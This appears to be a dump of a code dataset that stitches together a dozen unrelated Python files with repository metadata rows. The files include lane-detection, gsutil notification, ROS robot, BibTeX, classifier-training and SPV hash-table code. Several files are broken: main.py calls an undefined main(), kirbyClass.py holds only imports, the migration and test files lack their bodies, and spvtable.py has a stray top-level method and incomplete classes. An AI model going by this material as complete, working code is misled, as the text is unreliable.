    cv2.putText(img, rad_text, (10, 100), font, 1, (255, 255, 255), 2)
    # Invert the transform matrix from birds_eye (to later make the image back to normal below)
    Minv = np.linalg.inv(perspective_M)
    # Create an image to draw the lines on
    warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
    color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
    # Recast the x and y points into usable format for cv2.fillPoly()
    pts_left = np.array([np.transpose(np.vstack([fit_leftx, fity]))])
    pts_right = np.array([np.flipud(np.transpose(np.vstack([fit_rightx, fity])))])
    pts = np.hstack((pts_left, pts_right))
    # Draw the lane onto the warped blank image
    cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
    # Warp the blank back to original image space using inverse perspective matrix (Minv)
    newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
    # Combine the result with the original image
    result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
    return result
def process_image(image):
    """Run the full lane-detection pipeline on a single frame.

    Relies on the module-level calibration (``mtx``, ``dist``).  Returns the
    frame annotated with the lane overlay, curvature radius and car position.
    """
    return draw_lines(image, mtx, dist)
# Set the class lines equal to the variables used above
# These module-level Line objects hold the running fit state that
# first_lines / draw_lines read and update on every frame.
left_line = Left_Line()
right_line = Right_Line()
# Convert to video
# vid_output is where the image will be saved to
vid_output = 'project_video_detected.mp4'
# The file referenced in clip1 is the original video before anything has been done to it
# clip1 = VideoFileClip("project_video.mp4")
# NOTE: this function expects color images
# vid_clip = clip1.fl_image(process_image)
# vid_clip.write_videofile(vid_output, audio=False)
# Batch-process every file in test_images instead of the (commented-out) video.
# NOTE(review): cv2.imread returns None for unreadable/non-image files -
# assumes the directory contains only valid images; confirm before shipping.
test_img_dir = 'test_images'
for test_img in os.listdir(test_img_dir):
    frame = cv2.imread(os.path.join(test_img_dir, test_img))
    blend = process_image(frame)
    # Save the annotated frame, then display it (BGR -> RGB for matplotlib)
    cv2.imwrite('output_images/{}'.format(test_img), blend)
    plt.imshow(cv2.cvtColor(blend, code=cv2.COLOR_BGR2RGB))
    plt.show()
| 39.743346 | 118 | 0.670796 |
620552e0f37628fdaf507905b2e507f52f6149a8 | 158 | py | Python | pyblaze/nn/data/__init__.py | Greenroom-Robotics/pyblaze | e45e27fbd400b6ae2365ad2347165c7b5154ac51 | [
"MIT"
] | 20 | 2020-03-29T08:43:15.000Z | 2021-12-17T21:38:17.000Z | pyblaze/nn/data/__init__.py | borchero/bxtorch | 8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb | [
"MIT"
] | 4 | 2020-10-27T20:43:40.000Z | 2021-04-29T12:19:39.000Z | pyblaze/nn/data/__init__.py | borchero/bxtorch | 8d01568c8ee9fc05f5b3c84ca3ec68ea74eef9eb | [
"MIT"
] | 2 | 2020-08-16T18:10:49.000Z | 2021-03-31T23:17:28.000Z | import pyblaze.nn.data.extensions
from .noise import NoiseDataset, LabeledNoiseDataset
from .zip import ZipDataLoader
from .transform import TransformDataset
| 31.6 | 52 | 0.860759 |
62068b662c2e57cf87551975ea7649e2326a5cd6 | 3,128 | py | Python | main.py | MokkoFm/autoposting-comic-books | 07021369e88370aeda33fe4b5d4bb3cd8bf01399 | [
"MIT"
] | null | null | null | main.py | MokkoFm/autoposting-comic-books | 07021369e88370aeda33fe4b5d4bb3cd8bf01399 | [
"MIT"
] | null | null | null | main.py | MokkoFm/autoposting-comic-books | 07021369e88370aeda33fe4b5d4bb3cd8bf01399 | [
"MIT"
] | null | null | null | import requests
import os
import random
from dotenv import load_dotenv
import sys
if __name__ == "__main__":
main()
| 27.681416 | 79 | 0.636189 |
620690da1f145b5b2420aa8da8460ba8aab12a29 | 9,636 | py | Python | google-cloud-sdk/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2020-07-25T12:09:01.000Z | 2020-07-25T12:09:01.000Z | # -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides the notification command to gsutil."""
from __future__ import absolute_import
import getopt
import uuid
from gslib import metrics
from gslib.cloud_api import AccessDeniedException
from gslib.command import Command
from gslib.command import NO_MAX
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.help_provider import CreateHelpText
from gslib.storage_url import StorageUrlFromString
_WATCHBUCKET_SYNOPSIS = """
gsutil notification watchbucket [-i id] [-t token] app_url bucket_url...
"""
_STOPCHANNEL_SYNOPSIS = """
gsutil notification stopchannel channel_id resource_id
"""
_SYNOPSIS = _WATCHBUCKET_SYNOPSIS + _STOPCHANNEL_SYNOPSIS.lstrip('\n')
_WATCHBUCKET_DESCRIPTION = """
<B>WATCHBUCKET</B>
The watchbucket sub-command can be used to watch a bucket for object changes.
A service account must be used when running this command.
The app_url parameter must be an HTTPS URL to an application that will be
notified of changes to any object in the bucket. The URL endpoint must be
a verified domain on your project. See
`Notification Authorization <https://cloud.google.com/storage/docs/object-change-notification#_Authorization>`_
for details.
The optional id parameter can be used to assign a unique identifier to the
created notification channel. If not provided, a random UUID string will be
generated.
The optional token parameter can be used to validate notifications events.
To do this, set this custom token and store it to later verify that
notification events contain the client token you expect.
"""
_STOPCHANNEL_DESCRIPTION = """
<B>STOPCHANNEL</B>
The stopchannel sub-command can be used to stop sending change events to a
notification channel.
The channel_id and resource_id parameters should match the values from the
response of a bucket watch request.
"""
_DESCRIPTION = """
The notification command can be used to configure notifications.
For more information on the Object Change Notification feature, please see:
https://cloud.google.com/storage/docs/object-change-notification
The notification command has two sub-commands:
""" + _WATCHBUCKET_DESCRIPTION + _STOPCHANNEL_DESCRIPTION + """
<B>EXAMPLES</B>
Watch the bucket example-bucket for changes and send notifications to an
application server running at example.com:
gsutil notification watchbucket https://example.com/notify \\
gs://example-bucket
Assign identifier my-channel-id to the created notification channel:
gsutil notification watchbucket -i my-channel-id \\
https://example.com/notify gs://example-bucket
Set a custom client token that will be included with each notification event:
gsutil notification watchbucket -t my-client-token \\
https://example.com/notify gs://example-bucket
Stop the notification event channel with channel identifier channel1 and
resource identifier SoGqan08XDIFWr1Fv_nGpRJBHh8:
gsutil notification stopchannel channel1 SoGqan08XDIFWr1Fv_nGpRJBHh8
<B>NOTIFICATIONS AND PARALLEL COMPOSITE UPLOADS</B>
By default, gsutil enables parallel composite uploads for large files (see
"gsutil help cp"), which means that an upload of a large object can result
in multiple temporary component objects being uploaded before the actual
intended object is created. Any subscriber to notifications for this bucket
will then see a notification for each of these components being created and
deleted. If this is a concern for you, note that parallel composite uploads
can be disabled by setting "parallel_composite_upload_threshold = 0" in your
boto config file.
"""
# User-facing error shown when a watchbucket call is rejected because the
# endpoint URL is not an authorized/whitelisted domain for the project.
# FIX: corrected the "Google Webmain Tools" typo to "Google Webmaster Tools".
NOTIFICATION_AUTHORIZATION_FAILED_MESSAGE = """
Watch bucket attempt failed:
{watch_error}
You attempted to watch a bucket with an application URL of:
{watch_url}
which is not authorized for your project. Please ensure that you are using
Service Account authentication and that the Service Account's project is
authorized for the application URL. Notification endpoint URLs must also be
whitelisted in your Cloud Console project. To do that, the domain must also be
verified using Google Webmaster Tools. For instructions, please see:
https://cloud.google.com/storage/docs/object-change-notification#_Authorization
"""
# Help text assembled from the synopsis/description constants above: the full
# command help plus one variant per sub-command.
_DETAILED_HELP_TEXT = CreateHelpText(_SYNOPSIS, _DESCRIPTION)
_watchbucket_help_text = (
    CreateHelpText(_WATCHBUCKET_SYNOPSIS, _WATCHBUCKET_DESCRIPTION))
_stopchannel_help_text = (
    CreateHelpText(_STOPCHANNEL_SYNOPSIS, _STOPCHANNEL_DESCRIPTION))
| 36.638783 | 113 | 0.732669 |
62082f1a3d2df0aa7c200e1ac37a24e5cc695f32 | 18,526 | py | Python | src/mecanum_robot_gazebo/src/tool/pingpong_utils.py | diddytpq/Predict-Tennisball-LandingPoint | 0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a | [
"MIT"
] | null | null | null | src/mecanum_robot_gazebo/src/tool/pingpong_utils.py | diddytpq/Predict-Tennisball-LandingPoint | 0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a | [
"MIT"
] | null | null | null | src/mecanum_robot_gazebo/src/tool/pingpong_utils.py | diddytpq/Predict-Tennisball-LandingPoint | 0ae4a9ff45fd4dd82b4b4e3cc2533e7fd5d1506a | [
"MIT"
] | null | null | null | import rospy
import sys
from gazebo_msgs.srv import *
from geometry_msgs.msg import *
import tf.transformations as tft
import numpy as np
import math
import roslib
from std_msgs.msg import Empty as EmptyMsg
from std_msgs.msg import Float64
from nav_msgs.msg import Odometry
import time
from tool.mecanum_utils import *
roslib.load_manifest('mecanum_robot_gazebo')
def ball_catch_check(mecanum, ball_name, left_score, right_score, away_mecanum):
    """Check whether *mecanum* caught the ball or the ball went out of play.

    Queries Gazebo for the ball's current pose, compares it with the robot's
    pose and:
      * awards a point via ``score_board`` when the ball crosses |x| > 15
        (out of the court), printing the opponent's launch parameters;
      * deletes the ball and reports it handled when it is inside the catch
        box (0.6 m in x/y, 1 m in z) around the robot, or out of bounds.

    :param mecanum: robot wrapper exposing get_position()/del_ball() and an
        ``object_pose`` attribute.
    :param ball_name: Gazebo model name of the ball.
    :param left_score: current left-side score (passed through to score_board).
    :param right_score: current right-side score (passed through to score_board).
    :param away_mecanum: opponent robot; its ``v`` / ``launch_angle`` are
        printed when a point is scored.
    :return: (left_score, right_score, meg) - meg is True when the ball was
        caught or went out and has been deleted.
    """
    meg = False
    g_get_state = rospy.ServiceProxy("/gazebo/get_model_state", GetModelState)
    ball_state = g_get_state(model_name = ball_name)
    mecanum.get_position()
    ball_x = ball_state.pose.position.x
    ball_y = ball_state.pose.position.y
    ball_z = ball_state.pose.position.z
    robot_x = mecanum.object_pose.position.x
    robot_y = mecanum.object_pose.position.y
    robot_z = mecanum.object_pose.position.z
    # Per-axis distances between ball and robot (the unused Euclidean
    # distance and the no-op debug string were removed).
    distance_x = abs(ball_x - robot_x)
    distance_y = abs(ball_y - robot_y)
    distance_z = abs(ball_z - robot_z)
    # Ball left the court: award the point and report launch parameters.
    if abs(ball_x) > 15:
        left_score, right_score = score_board(left_score, right_score, ball_name)
        print("--------------------------------------------------")
        print("\tvelocity :", away_mecanum.v)
        print("\tangle :", away_mecanum.launch_angle)
    # Caught (inside the catch box) or out of bounds: remove the ball.
    if (distance_x < 0.6 and distance_y < 0.6 and distance_z < 1) or abs(ball_x) > 15:
        mecanum.del_ball()
        meg = True
    return left_score, right_score, meg
def return_home(home_mecanum):
    """Drive *home_mecanum* back towards its home pose on the baseline.

    Reads the robot's current pose, computes the positional error towards the
    home point at x = -11 (left side) or x = +11 (right side), publishes
    proportional velocity commands plus the corresponding per-wheel speeds,
    and stops the robot once it is within 0.1 m of home in both axes.

    NOTE(review): if robot_x is exactly 0 neither branch below runs and
    x_error / y_error are unbound, raising NameError - confirm this cannot
    occur in practice.
    """
    home_mecanum.get_position()
    robot_x = home_mecanum.object_pose.position.x
    robot_y = home_mecanum.object_pose.position.y
    robot_z = home_mecanum.object_pose.position.z
    # Current heading in degrees; assumes angle[2] is yaw in radians -
    # TODO confirm against mecanum_utils.
    robot_angle = np.rad2deg(home_mecanum.angle[2])
    # Left-side robot: home at (-11, 0), target heading 0 degrees.
    if robot_x < 0:
        x_error = -11 - robot_x
        y_error = -robot_y
        home_mecanum.twist.angular.z = -robot_angle/100
    # Right-side robot: home at (+11, 0), target heading 180 degrees.
    if robot_x > 0:
        x_error = robot_x - 11
        y_error = robot_y
        if robot_angle > 0 :
            home_mecanum.twist.angular.z = (180 - robot_angle)/100
        else:
            home_mecanum.twist.angular.z = -(180 + robot_angle)/100
    # Proportional control: commanded speed scales with the remaining error,
    # clamped by check_velocity.
    vel_forward_apply, vel_lateral_apply = home_mecanum.check_velocity(home_mecanum.vel_forward * (x_error*0.5),
                                                            home_mecanum.vel_lateral * (y_error*0.5))
    home_mecanum.twist.linear.x = vel_forward_apply
    home_mecanum.twist.linear.y = vel_lateral_apply
    home_mecanum.twist.linear.z = 0
    # Convert the body twist into the four mecanum wheel angular velocities
    # and publish both the twist and each wheel command.
    home_mecanum.wheel_vel = mecanum_wheel_velocity(home_mecanum.twist.linear.x, home_mecanum.twist.linear.y, home_mecanum.twist.angular.z)
    home_mecanum.pub.publish(home_mecanum.twist)
    home_mecanum.pub_wheel_vel_1.publish(home_mecanum.wheel_vel[0,:])
    home_mecanum.pub_wheel_vel_2.publish(home_mecanum.wheel_vel[1,:])
    home_mecanum.pub_wheel_vel_3.publish(home_mecanum.wheel_vel[2,:])
    home_mecanum.pub_wheel_vel_4.publish(home_mecanum.wheel_vel[3,:])
    # Close enough to home in both axes: stop all motion.
    if abs(x_error) <0.1 and abs(y_error)< 0.1 :
        home_mecanum.stop()
6208cb2a2c64c71c60c631414ac312652b301b34 | 21,926 | py | Python | kirbyClass.py | mattuff/KirbyCalculus | f2a2d2839cd5a658e5e82430619f43dfa6a65502 | [
"MIT"
] | 1 | 2022-03-11T07:45:02.000Z | 2022-03-11T07:45:02.000Z | kirbyClass.py | mattuff/KirbyCalculus | f2a2d2839cd5a658e5e82430619f43dfa6a65502 | [
"MIT"
] | null | null | null | kirbyClass.py | mattuff/KirbyCalculus | f2a2d2839cd5a658e5e82430619f43dfa6a65502 | [
"MIT"
] | null | null | null | from crossingClass import *
from joinClass import *
from strandClass import *
from componentClass import *
| 32.434911 | 144 | 0.528505 |
62098ed13ce2805c2274aa650c177f0c748ff79f | 401 | py | Python | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 10 | 2018-05-13T18:01:57.000Z | 2018-12-23T17:11:14.000Z | projects/migrations/0017_project_status_isvalidated.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 88 | 2018-05-04T15:33:46.000Z | 2022-03-08T21:09:21.000Z | projects/migrations/0017_project_status_isvalidated.py | joatuapp/joatu-django | 5626d03ba89c55650ff5bff2e706ca0883ae3b9c | [
"MIT"
] | 7 | 2018-05-08T16:05:06.000Z | 2018-09-13T05:49:05.000Z | # Generated by Django 2.0.3 on 2018-03-26 01:17
from django.db import migrations, models
| 21.105263 | 53 | 0.613466 |
6209f7fa8b911f0682b7e6cecc7dc9fe96d9e302 | 1,177 | py | Python | ps1/ps1_3.py | collin-li/mitx-6.00.1x | 7fb111586c6b82e205e86fadfb4d91d09de46808 | [
"MIT"
] | null | null | null | ps1/ps1_3.py | collin-li/mitx-6.00.1x | 7fb111586c6b82e205e86fadfb4d91d09de46808 | [
"MIT"
] | 1 | 2017-02-06T02:46:08.000Z | 2017-02-06T02:46:08.000Z | ps1/ps1_3.py | collin-li/mitx-6.00.1x | 7fb111586c6b82e205e86fadfb4d91d09de46808 | [
"MIT"
] | null | null | null | # PROBLEM
#
# Assume s is a string of lower case characters.
#
# Write a program that prints the longest substring of s in which the letters
# occur in alphabetical order. For example, if s = 'azcbobobegghakl', then your
# program should print:
#
# 'Longest substring in alphabetical order is: beggh'
#
# In case of ties, print the first substring. For example, if s = 'abcbcd',
# then your program should print:
#
# 'Longest substring in alphabetical order is: abc'
# For test purposes
s = 'azcbobobegghakl'

# SOLUTION
# Single scan: track where the current non-decreasing run started and
# remember the longest run seen so far (the first one wins on ties).
if len(s) > 1:
    run_start = 0
    best_start, best_len = 0, 1
    for idx in range(1, len(s)):
        if s[idx - 1] > s[idx]:
            run_start = idx
        run_len = idx - run_start + 1
        if run_len > best_len:
            best_start, best_len = run_start, run_len
    bestsubstring = s[best_start:best_start + best_len]
else:
    bestsubstring = s

print('Longest substring in alphabetical order is: ' + bestsubstring)
| 26.155556 | 80 | 0.626168 |
620afd69fe7804f73854cad5c0dd48effc58af61 | 992 | py | Python | bib2web/mandatory_fields.py | Juvawa/bib2web | 8d6c2244e46eefee1a519f8b3b656a143aa8bd9e | [
"MIT"
] | null | null | null | bib2web/mandatory_fields.py | Juvawa/bib2web | 8d6c2244e46eefee1a519f8b3b656a143aa8bd9e | [
"MIT"
] | null | null | null | bib2web/mandatory_fields.py | Juvawa/bib2web | 8d6c2244e46eefee1a519f8b3b656a143aa8bd9e | [
"MIT"
# Mandatory BibTeX fields for each supported entry type.  Every entry shares
# the 'ENTRYTYPE' and 'ID' bookkeeping fields; the per-type list adds the
# fields this tool requires for that entry type.
# FIX: the original assignment line was fused with dataset-dump metadata,
# leaving the module unparseable; the mapping is rebuilt with identical content.
mandatory = {
    entry_type: ['ENTRYTYPE', 'ID'] + specific_fields
    for entry_type, specific_fields in {
        'article': ['author', 'title', 'journal', 'year', 'volume'],
        'book': ['title', 'publisher', 'year'],
        'booklet': ['title', 'year'],
        'conference': ['author', 'title', 'booktitle', 'publisher', 'year'],
        'inbook': ['title', 'publisher', 'year'],
        'incollection': ['author', 'title', 'booktitle', 'publisher', 'year'],
        'inproceedings': ['author', 'title', 'booktitle', 'year'],
        'manual': ['title', 'year'],
        'mastersthesis': ['author', 'title', 'school', 'year'],
        'misc': ['title', 'year'],
        'phdthesis': ['author', 'title', 'school', 'year'],
        'proceedings': ['title', 'year'],
        'techreport': ['author', 'title', 'institution', 'year'],
        'unpublished': ['author', 'title', 'note'],
    }.items()
}
620c76cdf8b6c6cb6855109a069ebc57b866672e | 6,809 | py | Python | trainAndTest/processOneFold_sm.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | 5 | 2020-01-21T21:11:49.000Z | 2022-02-06T19:55:28.000Z | trainAndTest/processOneFold_sm.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | null | null | null | trainAndTest/processOneFold_sm.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | 3 | 2018-05-25T14:57:36.000Z | 2022-01-27T12:53:41.000Z | from __future__ import print_function
import itertools
import sys, os
import inspect
import numpy as np
from joblib import load as joblib_load
from .resultsManager import ResultsManager
#from .classifiers.randomForest import trainMethod, predictMethod
from .classifiers.xgBoost import trainMethod, predictMethod
def getDataForTestFromPrefix( testPrefix, testPath ):
  '''
  Load the first (alphabetically) data file in testPath whose name starts
  with testPrefix and unpack everything needed for prediction and testing.

  :param testPrefix: str. The filename prefix of the complex to load. E.g. "1A2K"
  :param testPath: str. The path where data files are contained
  :return (data_d, data_t, labels, ids)
    data_d: np.array (n,m). Amino-acid pairs codified in direct form
            (first ligand aa, second receptor aa), ready for the classifier
    data_t: np.array (n,m). The same pairs codified in transpose form
            (first receptor aa, second ligand aa)
    labels: np.array of (-1, 1) labels, one per pair
    ids:    pandas.DataFrame with columns
            chainIdL resIdL resNameL chainIdR resIdR resNameR categ
  Implicitly returns None when no file matches the prefix.
  '''
  matching = (name for name in sorted(os.listdir(testPath))
              if name.startswith(testPrefix))
  for fname in matching:
    complexData = joblib_load(os.path.join(testPath, fname))
    direct, transposed = complexData.getData()
    return (direct, transposed, complexData.getLabels(), complexData.getIds())
def getDataForClassifierFromComplexes(listOfComplexes):
  '''
  Collect the matrices needed to train a classifier from a list of codified
  complexes (codifyComplexes.ComplexCodified.ComplexCodified).  Each element
  may also be a generator yielding chunks of a complex.

  :param listOfComplexes: list/tuple of complexes (or a single complex)
  :return (dataDir, dataTrans, labels, complexesNumId)
    dataDir:  np.array (n,m). Pairs codified in direct form
              (first ligand aa, second receptor aa)
    dataTrans: np.array (n,m). Pairs codified in transpose form
              (first receptor aa, second ligand aa)
    labels:   np.array of (-1, 1) labels, one per pair
    complexesNumId: list of ints mapping each row to the index of the
              complex it came from
  '''
  directChunks, transChunks, labelChunks = [], [], []
  prefixes = []
  complexesNumId = []
  if not isinstance(listOfComplexes, (list, tuple)):
    listOfComplexes = [listOfComplexes]
  for complexNum, ppiComplex in enumerate(listOfComplexes):
    batches = ppiComplex if inspect.isgenerator(ppiComplex) else [ppiComplex]
    for dataBatch in batches:
      direct, transposed = dataBatch.getData()
      directChunks.append(direct)
      transChunks.append(transposed)
      labelChunks.append(dataBatch.getLabels())
      prefixes.append(dataBatch.getPrefix())
      complexesNumId.extend([complexNum] * direct.shape[0])
  return (np.concatenate(directChunks), np.concatenate(transChunks),
          np.concatenate(labelChunks), complexesNumId)
def trainAndTestOneFold(trainData, testPrefixes, testPath, outputPath, verbose=False, ncpu=1):
    '''
    Trains and tests one fold.

    :param trainData: a numpy array for training with first column labels and the others features
    :param testPrefixes: str[]. A list that contains prefixes for all complexes to be tested
    :param testPath: str. Path to a dir where testing data files are stored
    :param outputPath: str. Path to a dir where predictions will be stored (None to skip saving)
    :param verbose: boolean. Whether or not print to stdout info
    :param ncpu: int. Number of cpu's to use in parallel
    :return (finalResults, modelo). finalResults: list of ResultsManager (one per test complex).
            modelo: the fitted classifier, or None if nothing needed training.
    '''
    resultsForEvaluation_list = []
    testPrefixesNotEvaluated = []
    finalResults = []
    # Split prefixes into already-computed results (reloaded from disk) and pending ones.
    for testPrefix in testPrefixes:
        if outputPath is not None:
            outName = os.path.join(outputPath, testPrefix + ".res.tab")
            # NOTE(review): reuse of cached results is gated on `verbose`; with
            # verbose=False existing results are recomputed (and not re-saved, see
            # the isfile guard below). Looks unintentional -- confirm with authors.
            if verbose and os.path.isfile(outName):
                print("Complex already computed: %s" % (outName))
                resultsForEvaluation_list.append((testPrefix, ResultsManager.loadExistingResults(outName)))
            else:
                testPrefixesNotEvaluated.append(testPrefix)
        else:
            testPrefixesNotEvaluated.append(testPrefix)
    modelo = None
    if len(testPrefixesNotEvaluated) > 0 or len(testPrefixes) == 0:
        if verbose:
            print("Testing:", testPrefixesNotEvaluated)
            print("Training classifier")
            verboseLevel = 1
        else:
            verboseLevel = 0
        # trainData layout: column 0 holds the labels, remaining columns the features.
        modelo = trainMethod(trainData[:, 1:], trainData[:, 0], verboseLevel=verboseLevel, ncpu=ncpu)
        if verbose: print("Classifier fitted.")
        for testPrefix in testPrefixesNotEvaluated:
            if verbose: print("Computing predictions for %s" % (testPrefix))
            testDataDirect, testDataTrans, testlabels, testPairsIds = getDataForTestFromPrefix(testPrefix, testPath)
            # Score each pair in both (ligand, receptor) orders; ResultsManager merges them.
            prob_predictionsDir = predictMethod(modelo, testDataDirect)
            prob_predictionsTrans = predictMethod(modelo, testDataTrans)
            resultEval = ResultsManager(testPrefix, prob_predictionsDir, prob_predictionsTrans, testPairsIds)
            if verbose: print("Evaluating predictions of %s" % (testPrefix))
            resultEval.getFullEvaluation()
            if verbose: print(resultEval)
            finalResults.append(resultEval)
            if outputPath is not None:
                outName = os.path.join(outputPath, testPrefix + ".res.tab")
                # Never overwrite an existing result file.
                if not os.path.isfile(outName):
                    if verbose: print("Saving results at %s" % (outName))
                    resultEval.writeResults(outName)
    # Re-evaluate the results that were reloaded from disk.
    for testPrefix, resultEval in resultsForEvaluation_list:
        if verbose: print("Evaluating predictions for %s" % (testPrefix))
        resultEval.getFullEvaluation()
        if verbose: print(resultEval)
        finalResults.append(resultEval)
    return finalResults, modelo
| 46.636986 | 122 | 0.697606 |
620d0e354faec7f287cbe008e0fab6e397c53f56 | 7,289 | py | Python | manila_tempest_tests/tests/api/admin/test_snapshot_export_locations_negative.py | openstack/manila-tempest-plugin | 9c4a97b150e15b814acd4feb4da858a0eeff881e | [
"Apache-2.0"
] | 9 | 2017-10-31T10:36:34.000Z | 2020-10-07T01:31:38.000Z | manila_tempest_tests/tests/api/admin/test_snapshot_export_locations_negative.py | openstack/manila-tempest-plugin | 9c4a97b150e15b814acd4feb4da858a0eeff881e | [
"Apache-2.0"
] | null | null | null | manila_tempest_tests/tests/api/admin/test_snapshot_export_locations_negative.py | openstack/manila-tempest-plugin | 9c4a97b150e15b814acd4feb4da858a0eeff881e | [
"Apache-2.0"
] | 4 | 2018-07-19T13:55:51.000Z | 2021-11-05T17:50:27.000Z | # Copyright (c) 2017 Hitachi Data Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import config
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from testtools import testcase as tc
from manila_tempest_tests.tests.api import base
from manila_tempest_tests import utils
CONF = config.CONF
| 41.651429 | 79 | 0.69255 |
620d308ec14780c98f6cbb15fbaefde43dfb9edb | 6,614 | py | Python | gateway/spvtable.py | trinity-project/trinity | 081eba1d4294a3bed33ba18c3f7b862b8803ee22 | [
"MIT"
] | 60 | 2018-01-12T07:33:15.000Z | 2021-12-28T23:06:28.000Z | gateway/spvtable.py | trinity-project/trinity | 081eba1d4294a3bed33ba18c3f7b862b8803ee22 | [
"MIT"
] | 13 | 2018-01-23T00:14:35.000Z | 2020-04-23T00:03:31.000Z | gateway/spvtable.py | trinity-project/trinity | 081eba1d4294a3bed33ba18c3f7b862b8803ee22 | [
"MIT"
] | 13 | 2018-01-05T07:27:29.000Z | 2021-01-06T16:45:05.000Z | """Author: Trinity Core Team
MIT License
Copyright (c) 2018 Trinity
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
import json
import copy
from treelib import Node, Tree
from treelib.exceptions import DuplicatedNodeIdError
import re
def sync_tree(self, peer_tree):
    """
    Graft a peer's tree into this one.

    Deep-copies ``peer_tree``, prunes from the copy every node id already
    present in this tree (keeping the peer's root so the copy stays a valid
    tree), removes the peer's root from this tree if it is already known,
    and finally pastes the pruned copy under this tree's root.

    NOTE(review): the pruning presumably exists to avoid treelib's
    DuplicatedNodeIdError on ``paste`` -- confirm against treelib semantics.

    :param peer_tree: treelib.Tree received from a peer; not modified.
    :return: None (this tree is modified in place)
    """
    copy_peer_tree = copy.deepcopy(peer_tree)
    # if contains each other
    for self_nid in self.nodes.keys():
        if copy_peer_tree.contains(self_nid) and self_nid != peer_tree.root:
            copy_peer_tree.remove_node(self_nid)
    # Drop the peer root locally so the paste below cannot collide on its id.
    if self.contains(peer_tree.root):
        self.remove_node(peer_tree.root)
    # print(peer_tree.to_dict(with_data=True))
    self.paste(self.root, copy_peer_tree)
class WalletSet(object):
class SPVHashTable(object):
    """
    Hash table mapping each wallet node's public key to the list of SPV
    public keys attached to it (backed by the plain dict ``self.maps``).
    """
    # Singleton slot; managed elsewhere in the module.
    hash_instance = None

    def find_keys(self, spv_key):
        """
        Reverse lookup: every wallet a given SPV key is attached to.

        :param spv_key: The public key string of the spv
        :return: list type. [wallet-1-public-key, wallet-2-public-key, ...]
        """
        return [wallet for wallet in self.maps if spv_key in self.find(wallet)]

    def find(self, key):
        """
        :param key: The public key string of the wallet
        :return: list type. [spv-1-public-key, spv-2-public-key, ...] or None
                 when the wallet is unknown.
        """
        return self.maps.get(key)

    def add(self, key, value):
        """
        Attach an SPV key to a wallet key. Duplicates are allowed.

        :param key: The public key string of the wallet
        :param value: the public key of the spv
        """
        current = self.maps.get(key)
        if current is None:
            self.maps[key] = [value]
        else:
            current.append(value)

    def remove(self, key, value):
        """
        Detach one SPV key from a wallet key; missing entries are ignored.

        :param key: The public key string of the wallet
        :param value: the public key of the spv
        """
        current = self.maps.get(key)
        if current is not None and value in current:
            current.remove(value)

    def sync_table(self, hash_table):
        """
        Merge another wallet->spv mapping into this one, deduplicating the
        SPV list of every wallet that already exists locally.

        :param hash_table: json str or dict type
        """
        if isinstance(hash_table, str):
            # decoder
            hash_table = self.to_dict(hash_table)
        if not hash_table:
            return
        for wallet in hash_table:
            if wallet in self.maps:
                self.maps[wallet].extend(hash_table[wallet])
                self.maps[wallet] = list(set(self.maps[wallet]))
            else:
                self.maps[wallet] = hash_table[wallet]
